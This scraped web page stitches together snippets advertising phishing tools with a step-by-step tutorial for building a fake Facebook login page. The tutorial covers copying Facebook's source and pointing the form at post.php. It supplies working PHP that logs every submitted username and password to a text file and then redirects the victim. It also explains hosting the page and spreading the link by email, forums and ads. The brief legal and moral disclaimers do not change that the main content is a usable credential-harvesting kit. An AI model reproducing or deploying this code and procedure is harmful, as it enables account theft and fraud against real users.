- What is Phishing? Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows: A user clicks on a bad link to a phishing site.
- Actually, phishing is the way for stealing someone detail like password of any account. Snapchat is a next-level social media app. It is totally different from Facebook, Instagram, etc. In this phishing attack method attackers simply create a clone website of any website like Instagram, Facebook, Gmail, Twitter, etc.
- Gophish makes it easy to create or import pixel-perfect phishing templates. Our web UI includes a full HTML editor, making it easy to customize your templates right in your browser.
Facebook Phishing Page Download
Well, With The Help Of This Concept A Hacker Can Create Duplicate Copy of Original Site To Interact With Victim In Place Of Original Site That Can Cause Victim Data leak Or fraud. This Duplicate Webpage Trap is also called Phishing Page. Website Cloning Also Helps Hacker's To Find Vulnerability In Website Source Code. Best fake page maker work with Ngrok it has 17 different type of phishing page - FDX100/Phisher-man.
Today I am going to explain you how to make your own Phishing page without any sort of copy & pasting but just with a simple click.
Usage of Shellphish for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. I and Developers of this tool assume no liability and are not responsible for any misuse or damage caused by this program.
Last Updated on March 10, 2021 by
In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.
Phishing Page Maker Download
If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.
What is Phishing?
Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:
A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.
However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.
- Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
- Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
- If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
- You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
- Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
- Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
- Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
- At this point, you should now have two files saved: index.htm and post.php.
- Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using Bluehost.
- After you have signed up for an account, browse to the control panel, and then to file manager.
- Once the window opens, go to publick_html.
- Delete default.php, and then upload index.htm and post.php.
- Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
- The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
- Now go back to the file manager and public_html. There should be a file labeled username.txt.
- Open this file and you should be able to see login credentials that have been entered by a test user.
Final Thoughts
Phishing Page Maker Tool Download
It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.